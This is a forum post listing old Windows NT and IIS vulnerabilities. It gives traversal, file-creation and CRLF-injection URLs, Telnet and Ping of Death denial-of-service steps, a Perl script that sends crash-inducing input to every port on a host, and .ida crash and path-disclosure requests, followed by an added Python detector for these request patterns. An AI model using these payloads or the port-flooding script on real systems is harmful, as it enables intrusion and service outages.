Title: NT vulnerabilities and descriptions (English)
Author: 雜七雜八  Time: 2011-1-13 17:12

Affected systems: NT 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: NT 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: NT 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):
# begin poke code
use Socket;
use FileHandle;
require "chat2.pl";          # Perl 4 era chat library; open_port returns undef when a connect fails

$systemname = shift @ARGV or die "usage: perl poke servername\n";

$verbose    = 1;   # tell me what you're hitting
$knownports = 1;   # don't hit known problem ports (53, 135, 1031)

for ($port = 1; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;                  # nothing listening on this port
    # about ten characters followed by a <CR>, as in the manual Telnet test above
    chat::print($fh, "This is about ten characters or more\r\n");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
# end poke code
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: NT 4.0

Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr>, will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error. The error occurred on date@ time. The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)"

--------------------------------------------------------------------------------
Affected systems: NT 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0).

When a remote attacker issues a URL request with the malformed URL:

http://www.example.com/...[25kb of '.']...ida

the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive) by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as:

http://www.microsoft.com/anything.ida

Or:

http://www.microsoft.com/anything.idq

a remote user will get a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
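Added example for this thread (not code from the original post): a small Python triage script that runs over a batch of request lines and tags the request shapes the post lists, the '..\..' traversal, the 'scripts..\..' form, the '>PATH\target.bat' redirection, the %0A%0D script-name injection, and the .ida/.idq probes including the long-name crash variant. It goes a step beyond the post by percent-decoding repeatedly, so a double-encoded '..' (%252e%252e) is caught too. The tag names, the 2048-byte threshold for a 'long' .ida name and the sample request lines are assumptions made for this demonstration, not anything from the original list.

```python
"""Flag the NT/IIS request shapes listed above in a batch of request lines.

Added example for this thread, not code from the original post. The tag
names, the LONG_IDA_NAME threshold and the sample request lines are
assumptions made for the demonstration.
"""
from urllib.parse import unquote

LONG_IDA_NAME = 2048  # assumed threshold; the post describes ~25kb of '.'


def decode_path(raw):
    """Percent-decode until stable (bounded), so %252e%252e cannot hide a '..'."""
    cur = raw
    for _ in range(3):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def escapes_root(path):
    """True if the path climbs above the web root; '\\' is treated like '/'."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def classify(raw_path):
    """Return sorted tags for one request path; an empty list means nothing matched."""
    path = raw_path.split("?", 1)[0]       # ignore the query string
    decoded = decode_path(path)
    segs = decoded.replace("\\", "/").split("/")
    tags = set()

    if escapes_root(decoded):
        tags.add("traversal")              # '/..\..' or a raw 'GET ../..'
    # IIS 1.0 style 'scripts..\..\name': a segment that embeds '..' next to a
    # backslash separator, even when our own normalisation stays inside the root
    if "\\" in decoded and any(".." in s and s != ".." for s in segs):
        tags.add("dotdot")
    if "\r" in decoded or "\n" in decoded:
        tags.add("crlf")                   # %0A%0D smuggled into a script name
    if ">" in decoded or "<" in decoded:
        tags.add("redirect")               # 'exploit.bat>PATH\target.bat'
    name = segs[-1].lower()
    if name.endswith((".ida", ".idq")):
        tags.add("ida_probe")              # path disclosure probe
        if len(name) > LONG_IDA_NAME:
            tags.add("ida_overflow")       # the 25kb-of-dots crash variant
    return sorted(tags)


def scan_requests(lines):
    """Map each request line's path to its tags; clean lines are omitted."""
    findings = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        tags = classify(parts[1])
        if tags:
            findings[parts[1]] = tags
    return findings


# Constructed request lines for this example, not captured traffic.
SAMPLE_REQUESTS = [
    "GET /index.htm HTTP/1.0",
    "GET /..\\.. HTTP/1.0",
    "GET /scripts..\\..\\scriptname HTTP/1.0",
    "GET /scripts/exploit.bat>PATH\\target.bat HTTP/1.0",
    "GET /scripts/script_name%0A%0D>PATH\\target.bat HTTP/1.0",
    "GET ../..",
    "GET /anything.idq HTTP/1.0",
    "GET /%252e%252e/%252e%252e/secret.txt HTTP/1.0",
]

if __name__ == "__main__":
    for path, tags in scan_requests(SAMPLE_REQUESTS).items():
        print(f"{','.join(tags):22} {path!r}")
```

The 'dotdot' tag is deliberately weaker than 'traversal': a strict segment parser keeps 'scripts..\..\scriptname' inside the root, but the post says IIS 1.0 resolved it differently, so the shape itself is worth a look rather than trusting our own normalisation to match the server's.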